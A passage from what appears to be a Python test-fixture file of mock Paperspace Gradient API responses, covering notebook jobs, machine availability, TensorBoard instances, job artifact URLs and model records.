"jobHandle": "jsyvcxoxch3jgu", "project": "Notebook-undefined", "projectHandle": "pr2u2sfja", "state": "Running", "token": "1d763ce770a195c98ea3d30588f3ad007c2b8403608ab091", "container": "Paperspace + Fast.AI 1.0 (V3)", "containerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "nhdf8zf3.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-04T10:23:04.762Z", "dtModified": "2019-09-04T10:23:04.762Z", "dtProvisioningStarted": "2019-09-04T10:26:05.190Z", "dtProvisioningFinished": "2019-09-04T10:28:13.609Z", "dtStarted": "2019-09-04T10:28:13.609Z", "dtFinished": None, "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": None, "jobId": 20219, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567592650-d5337953", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297204 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617086962", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1831 }, { "name": "My Notebook 123", "handle": "nslk5r03", "jobHandle": "jskm7amsly7mmj", "project": "Notebook-My Notebook 123", "projectHandle": "pr3qq8qlg", "state": "Stopped", "token": "7751a516535bf3d52c164315d6187c1c9a04f15c15cf1c15", "container": "nslk5r03", "containerUrl": "us.gcr.io/ps-development-229517/paperspace/pr3qq8qlg:nslk5r03", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "nslk5r03.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-04T10:22:43.248Z", "dtModified": "2019-09-04T10:22:43.248Z", "dtProvisioningStarted": "2019-09-04T10:25:26.545Z", "dtProvisioningFinished": "2019-09-04T10:27:24.319Z", "dtStarted": "2019-09-04T10:27:24.319Z", "dtFinished": "2019-09-04T16:27:52.044Z", "dtTeardownStarted": "2019-09-04T16:27:56.915Z", "dtTeardownFinished": "2019-09-04T16:28:57.796Z", "dtDeleted": None, "shutdownTimeout": 6, "jobId": 20218, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567592577", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617029024", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1830 }, { "name": "My Notebook 123", "handle": "ng9a3tp4", "jobHandle": "jg5vkj6d799z8", "project": "Notebook-My Notebook 123", "projectHandle": "pr5ngrxr9", "state": "Stopped", "token": "d9ba60e2bf7abd8ebd0c9988507ce203dd9baa7bc2b77284", "container": "ng9a3tp4", "containerUrl": "us.gcr.io/ps-development-229517/paperspace/pr5ngrxr9:ng9a3tp4", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "ng9a3tp4.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-04T10:16:22.362Z", "dtModified": "2019-09-04T10:16:22.362Z", "dtProvisioningStarted": "2019-09-04T10:18:46.309Z", "dtProvisioningFinished": "2019-09-04T10:20:45.879Z", "dtStarted": "2019-09-04T10:20:45.879Z", "dtFinished": "2019-09-04T16:20:51.718Z", "dtTeardownStarted": "2019-09-04T16:20:56.745Z", "dtTeardownFinished": "2019-09-04T16:22:03.922Z", "dtDeleted": None, "shutdownTimeout": 6, "jobId": 20217, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567592197", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617086541", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1829 }, { "name": "some_name", "handle": "ngw7piq9", "jobHandle": "jzhmk7fpluqje", "project": "Notebook-some_name", "projectHandle": "prg284tu2", "state": "Stopped", "token": "dc2c331ce694ebe5a615f6e5885f6a933fcb1be49cb0d17f", "container": "ngw7piq9", "containerUrl": "us.gcr.io/ps-development-229517/paperspace/prg284tu2:ngw7piq9", "baseContainer": "Paperspace + Fast.AI 1.0 (V3)", "baseContainerUrl": "paperspace/fastai:1.0-CUDA9.2-base-3.0-v1.0.6", "vmType": "K80", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "ngw7piq9.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": None, "dtCreated": "2019-09-03T11:06:18.154Z", "dtModified": "2019-09-03T11:06:18.154Z", "dtProvisioningStarted": "2019-09-03T11:08:36.286Z", "dtProvisioningFinished": "2019-09-03T11:10:36.471Z", "dtStarted": "2019-09-03T11:10:36.471Z", "dtFinished": "2019-09-03T17:10:53.440Z", "dtTeardownStarted": "2019-09-03T17:10:54.455Z", "dtTeardownFinished": "2019-09-03T17:12:01.889Z", "dtDeleted": None, "shutdownTimeout": 6, "jobId": 20206, "isPublic": False, "isPreemptible": False, "cpuHostname": "gradient-host-1567508793", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "12297212 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617088427", "gpuDevice": "/dev/nvidia0", "gpuDriver": "418.67", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1823 }, { "name": "some_notebook_name", "handle": "n8h0d5lf", "jobHandle": "js63sf787xc3mx", "project": "Notebook-some_notebook_name", "projectHandle": "prupasg3e", "state": "Error", "token": None, "container": "some_name", "containerUrl": "some_name", "baseContainer": "some_name", "baseContainerUrl": "some_name", "vmType": "G1", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "n8h0d5lf.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": "Error pulling container during provisioning for job js63sf787xc3mx: Error pulling image 'some_name': Error response from daemon: Get https://registry-1.docker.io/v2/library/some_name/manifests/latest: unauthorized: incorrect username or password", "dtCreated": "2019-08-30T12:31:43.392Z", "dtModified": "2019-08-30T12:31:43.392Z", "dtProvisioningStarted": "2019-08-30T12:33:34.650Z", "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-08-30T12:33:35.479Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 8, "jobId": 20163, "isPublic": False, "isPreemptible": True, "cpuHostname": "gradient-host-1567168315", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "1783380 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1811 }, { "name": "some_notebook_name", "handle": "nl0b6cn0", "jobHandle": "jss28gdrarcbrw", "project": "Notebook-some_notebook_name", "projectHandle": "pr43jj028", "state": "Error", "token": None, "container": "some_name", "containerUrl": "some_name", "baseContainer": "some_name", "baseContainerUrl": "some_name", "vmType": "G1", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "nl0b6cn0.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": "Error pulling container during provisioning for job jss28gdrarcbrw: Error pulling image 'some_name': Error response from daemon: Get https://registry-1.docker.io/v2/library/some_name/manifests/latest: unauthorized: incorrect username or password", "dtCreated": "2019-08-30T12:16:11.944Z", "dtModified": "2019-08-30T12:16:11.944Z", "dtProvisioningStarted": "2019-08-30T12:16:19.646Z", "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-08-30T12:16:20.382Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 8, "jobId": 20162, "isPublic": False, "isPreemptible": True, "cpuHostname": "gradient-host-1567167274", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "1783380 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1810 }, { "name": "some_notebook_name", "handle": "njmq1zju", "jobHandle": "jd35vd65dkqch", "project": "Notebook-some_notebook_name", "projectHandle": "prflq2sy0", "state": "Error", "token": None, "container": "None", "containerUrl": "None", "baseContainer": "None", "baseContainerUrl": "None", "vmType": "G1", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "njmq1zju.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": "Error pulling container during provisioning for job jd35vd65dkqch: Error pulling image 'None': Error response from daemon: Get https://registry-1.docker.io/v2/library/None/manifests/latest: unauthorized: incorrect username or password", "dtCreated": "2019-08-30T12:14:32.296Z", "dtModified": "2019-08-30T12:14:32.296Z", "dtProvisioningStarted": "2019-08-30T12:16:08.347Z", "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-08-30T12:16:09.132Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 8, "jobId": 20161, "isPublic": False, "isPreemptible": True, "cpuHostname": "gradient-host-1567167274", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "1783380 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1809 }, { "name": "some_notebook_name", "handle": "nfcuwqu5", "jobHandle": "je2cmiigxwhy0", "project": "Notebook-some_notebook_name", "projectHandle": "prl9nu5p7", "state": "Error", "token": None, "container": "some_name", "containerUrl": "some_name", "baseContainer": "some_name", "baseContainerUrl": "some_name", "vmType": "G1", "cluster": "PS Notebooks on GCP", "clusterId": "clmtkpnm2", "fqdn": "nfcuwqu5.dgradient.paperspace.com", "startedByUser": "first last", "startedByUserId": "ukgvw4i8", "namespace": "username", "parentJobId": None, "jobError": "Error pulling container during provisioning for job je2cmiigxwhy0: Error pulling image 'some_name': Error response from daemon: Get https://registry-1.docker.io/v2/library/some_name/manifests/latest: unauthorized: incorrect username or password", "dtCreated": "2019-08-30T12:13:30.657Z", "dtModified": "2019-08-30T12:13:30.657Z", "dtProvisioningStarted": "2019-08-30T12:15:11.388Z", "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-08-30T12:15:12.207Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "shutdownTimeout": 8, "jobId": 20160, "isPublic": False, "isPreemptible": True, "cpuHostname": "gradient-host-1567167224", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat md_clear arch_capabilities", "cpuMem": "1783380 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "id": 1808 } ], "availableMachines": [ { "vmTypeId": 5, "clusterId": 1, "isAvailable": False, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "0", "numAvailableNodes": "0", "id": 11, "cluster": { "name": "PS Notebooks", "type": 1, "regionId": 1, "showDisabled": False, "dtCreated": "2017-11-03T19:09:41.077Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "cls28l0qm", "cloud": None, "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 1 } }, { "vmTypeId": 7, "clusterId": 1, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "1", "numAvailableNodes": "1", "id": 15, "cluster": { "name": "PS Notebooks", "type": 1, "regionId": 1, "showDisabled": False, "dtCreated": "2017-11-03T19:09:41.077Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "cls28l0qm", "cloud": None, "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 1 } }, { "vmTypeId": 20, "clusterId": 3, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "2", "numAvailableNodes": "0", "id": 7, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 20, "clusterId": 3, "isAvailable": True, "isPreemptible": True, "showDisabled": False, "numActiveNodes": "2", "numAvailableNodes": "0", "id": 6, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 21, "clusterId": 3, "isAvailable": True, "isPreemptible": True, "showDisabled": False, "numActiveNodes": "0", "numAvailableNodes": "0", "id": 22, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 21, "clusterId": 3, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "0", "numAvailableNodes": "0", "id": 23, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 25, "clusterId": 3, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "1", "numAvailableNodes": "0", "id": 27, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 25, "clusterId": 3, "isAvailable": True, "isPreemptible": True, "showDisabled": False, "numActiveNodes": "1", "numAvailableNodes": "0", "id": 26, "cluster": { "name": "PS Notebooks on GCP", "type": 1, "regionId": 4, "showDisabled": False, "dtCreated": "2018-03-02T18:27:16.323Z", "dtModified": "2019-05-29T15:56:16.039Z", "dtDeleted": None, "handle": "clmtkpnm2", "cloud": "gcp", "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 3 } }, { "vmTypeId": 31, "clusterId": 90, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "1", "numAvailableNodes": "1", "id": 1, "cluster": { "name": "Free Public Notebooks", "type": 1, "regionId": 2, "showDisabled": False, "dtCreated": "2019-06-18T23:33:58.997Z", "dtModified": "2019-08-12T17:06:19.492Z", "dtDeleted": None, "handle": "cltwhzxx6", "cloud": None, "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 90 } }, { "vmTypeId": 32, "clusterId": 90, "isAvailable": True, "isPreemptible": False, "showDisabled": False, "numActiveNodes": "1", "numAvailableNodes": "1", "id": 12, "cluster": { "name": "Free Public Notebooks", "type": 1, "regionId": 2, "showDisabled": False, "dtCreated": "2019-06-18T23:33:58.997Z", "dtModified": "2019-08-12T17:06:19.492Z", "dtDeleted": None, "handle": "cltwhzxx6", "cloud": None, "isDeleted": False, "isPrivate": False, "isDefault": False, "fqdn": None, "id": 90 } } ], "total": 9, "runningTotal": 2, "displayTotal": 9 } TENSORBOARD_CREATE_RESPONSE_JSON = { "message": "success", "data": { "cluster_id": "some_cluster_id", "url": None, "id": "some_id", "instance": None, "dt_created": "2019-09-18T12:10:09.817102+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "some_project_id", "id": "some_experiment_id" }, { "project_id": "some_project_id", "id": "some_other_experiment_id" } ], "dt_deleted": None } } TENSORBOARD_DETAIL_RESPONSE_JSON = { "message": "success", "data": { "cluster_id": "some_cluster_id", "url": "https://aws-testing.paperspace.io/tensorboard/some_id/", "id": "some_id", "instance": { "type": "cpu", "size": "large", "count": 2 }, "dt_created": "2019-09-18T12:10:09.817102+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "some_project_id", "id": "some_experiment_id", "state": "Some State" }, { "project_id": "some_project_id", "id": "some_other_experiment_id", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" } } TENSORBOARD_UPDATE_RESPONSE_JSON = { "message": "success", "data": { "cluster_id": "some_cluster_id", "url": "https://aws-testing.paperspace.io/tensorboard/some_id/", "id": "some_id", "instance": { "type": "cpu", "size": "large", "count": 2 }, "dt_created": "2019-09-18T12:10:09.817102+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "some_project_id", "id": "some_experiment_id", "state": "Some State" }, { "project_id": "some_project_id", "id": "some_other_experiment_id", "state": "Some State" }, { "project_id": "some_project_id", "id": "some_third_experiment_id", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" } } TENSORBOARD_UPDATE_REMOVE_RESPONSE_JSON = { "message": "success", "data": { "cluster_id": "some_cluster_id", "url": "https://aws-testing.paperspace.io/tensorboard/some_id/", "id": "some_id", "instance": { "type": "cpu", "size": "large", "count": 2 }, "dt_created": "2019-09-18T12:10:09.817102+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "some_project_id", "id": "some_experiment_id", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" } } TENSORBOARD_LIST_RESPONSE_JSON = { "message": "success", "data": [ { "cluster_id": "clmtkpnm2", "url": "https://aws-testing.paperspace.io/tensorboard/tbrs2kcjman4ly/", "id": "tbrs2kcjman4ly", "instance": None, "dt_created": "2019-09-16T09:28:10.415478+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "prrdpg67x", "id": "ers2kcjman4ly", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" }, { "cluster_id": "clmtkpnm2", "url": "https://aws-testing.paperspace.io/tensorboard/tbskzep6d9po04d/", "id": "tbskzep6d9po04d", "instance": None, "dt_created": "2019-09-16T09:28:56.908450+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "prrdpg67x", "id": "ers2kcjman4ly", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" }, { "cluster_id": "clmtkpnm2", "url": "https://aws-testing.paperspace.io/tensorboard/tbsaq6hggzxcnet/", "id": "tbsaq6hggzxcnet", "instance": None, "dt_created": "2019-09-16T12:59:20.788663+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "prrdpg67x", "id": "ers2kcjman4ly", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" }, { "cluster_id": "clmtkpnm2", "url": "https://aws-testing.paperspace.io/tensorboard/tbwuzalec7ik58/", "id": "tbwuzalec7ik58", "instance": { "size": "large", "type": "cpu", "count": 2 }, "dt_created": "2019-09-17T07:43:39.679876+00:00", "image": "tensorflow/tensorflow:latest-py3", "experiments": [ { "project_id": "prrdpg67x", "id": "ers2kcjman4ly", "state": "Some State" } ], "dt_deleted": None, "state": "Some State" } ] } TENSORBOARD_DELETE_RESPONSE_JSON = { "message": "success" } LIST_JOB_FILES_RESPONSE_JSON = { 'data': [ { "file": "hello.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/artifacts/hello.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=7CT5k6buEmZe5k5E7g6BXMs2xV4%3D&response-content-disposition=attachment%3Bfilename%3D%22hello.txt%22&x-amz-security-token=some_amz_security_token" }, { "file": "hello2.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/artifacts/hello2.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=L1lI47cNyiROzdYkf%2FF3Cm3165E%3D&response-content-disposition=attachment%3Bfilename%3D%22hello2.txt%22&x-amz-security-token=some_amz_security_token" }, { "file": "keton/elo.txt", "url": "https://ps-projects.s3.amazonaws.com/some/path/artifacts/keton/elo.txt?AWSAccessKeyId=some_aws_access_key_id&Expires=713274132&Signature=tHriojGx03S%2FKkVGQGVI5CQRFTo%3D&response-content-disposition=attachment%3Bfilename%3D%22elo.txt%22&x-amz-security-token=some_amz_security_token" } ], } GET_PRESIGNED_URL_FOR_S3_BUCKET_RESPONSE_JSON = { "data": { "bucket_name": "ps-projects", "fields": { "AWSAccessKeyId": "SOME_AWS_ACCESS_KEY_ID", "key": "some/path/to/file/demo.zip", "policy": "base64policy=", "signature": "base64signature=" }, "url": "https://ps-projects.s3.amazonaws.com/" }, "message": "success" } DELETE_MODEL_404_RESPONSE_JSON = { "error": { "name": "Error", "status": 404, "message": "Unable to find model", }, } MODEL_CREATE_RESPONSE_JSON_V2 = { "id": "some_model_id", "projectId": None, "experimentId": None, "updatedByUserId": "ukgvw4i8", "updatedByUserEmail": "asd@paperspace.com", "modelType": "Custom", "name": "some_name", "tag": None, "summary": None, "detail": None, "params": None, "url": None, "notes": None, "isDeleted": False, "isPublic": False, "dtCreated": "2020-04-01T14:15:39.371Z", "dtModified": "2020-04-01T14:15:39.371Z", "dtUploaded": None, "dtDeleted": None, "modelPath": None, "deploymentState": None, "tags": None } MODEL_UPLOAD_GET_PRESIGNED_URL_RESPONSE = "https://ps-customstorage-development.s3.amazonaws.com/teo6raui0/models/" \ "moslrdsp1q4z4a2/keton.txt?AWSAccessKeyId=AKIAVWO7J5OJXEKIB7EJ&Content-Typ" \ "e=text%2Fplain&Expires=1585779340&Signature=82UPgvg0yBayLJCLMiNq6jc4mys%3D" MODEL_UPLOAD_RESPONSE_JSON = { "id": "some_model_id", "projectId": None, "experimentId": None, "updatedByUserId": "ukgvw4i8", "updatedByUserEmail": "some_email@paperspace.com", "modelType": "Tensorflow", "name": "some_name", "tag": None, "summary": {"key": "value"}, "detail": None, "params": None, "url": "s3://ps-projects-development/teo6raui0/models/some_model_id/saved_model.pb", "notes": "some notes", "isDeleted": False, "isPublic": False, "dtCreated": "2019-11-26T13:33:11.001Z", "dtModified": "2019-11-26T13:33:11.001Z", "dtUploaded": None, "dtDeleted": None, "modelPath": None, "deploymentState": None, } MODEL_DETAILS_RESPONSE_JSON = { "modelList": [ { "id": "some_id", "projectId": "some_project_id", "experimentId": "some_experiment_id", "updatedByUserId": "some_user_id", "updatedByUserEmail": "paperspace@paperspace.com", "modelType": "Tensorflow", "name": "some_name", "tag": None, "summary": None, "detail": None, "params": None, "url": "s3://ps-projects-development/asdf/some_project_id/some_experiment_id/model", "notes": None, "isDeleted": False, "isPublic": False, "dtCreated": "2019-12-13T23:00:26.077Z", "dtModified": "2019-12-13T23:00:26.077Z", "dtUploaded": None, "dtDeleted": None, "modelPath": None, "deploymentState": "Stopped" } ], "total": 96, "displayTotal": 1 } MODEL_DETAILS_RESPONSE_JSON_WITH_TAGS = { "modelList": [ { 